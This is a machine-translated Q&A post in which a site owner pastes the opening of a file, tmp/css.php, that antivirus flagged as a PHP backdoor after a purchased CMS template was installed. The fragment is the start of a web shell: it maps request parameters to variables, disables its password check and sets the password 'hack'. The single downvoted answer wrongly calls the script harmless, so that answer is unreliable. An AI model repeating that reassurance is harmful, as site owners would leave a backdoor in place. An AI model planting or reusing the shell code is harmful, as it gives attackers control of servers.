我最近在网上为cms系统购买了一个模板,并要求开发人员为我安装它,它不是一个便宜的模板,所以我有点惊讶,当我在备份我的文件时(通过filezilla到我的PC),我的AVG防病毒软件提示检测到特洛伊木马PHP / BackDoor.AG文件为威胁,此文件来自已上传到我服务器的文件中的tmp / css.php。
脚本如下所示:
error_reporting(7);
@set_magic_quotes_runtime(0);ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
} $$_key = $_value;
}}}/*===================== ³Ìà òÅäÖà =====================*/
$admin = array();
// ÊÇ·ñà èÒªÃÜÂëÑéÖ¤, true �ªà èÒªÑéÖ¤, false �ªÖ±½Ó½øÈë.à ÂÃæÑ¡à îÔò��à § $admin['check'] = false;
// Èç¹ûà èÒªÃÜÂëÑéÖ¤,Çëà �¸ÄµÇ½ÃÜÂë $admin['pass'] = 'hack';
我不知道这意味着什么,有更多的代码,如果有任何机构想要看看我可以发布一个链接到整个事情。我只需要知道是否从我的网络主机上删除它。
任何帮助,我将永远伟大!感谢
答案 0 :(得分:-1)
代码只是一个非常丑陋的“非魔术引用”脚本。评论看起来好像已经被糟糕的Unicode编码所碾压,可能不止一次。
否则,脚本对我来说似乎无害。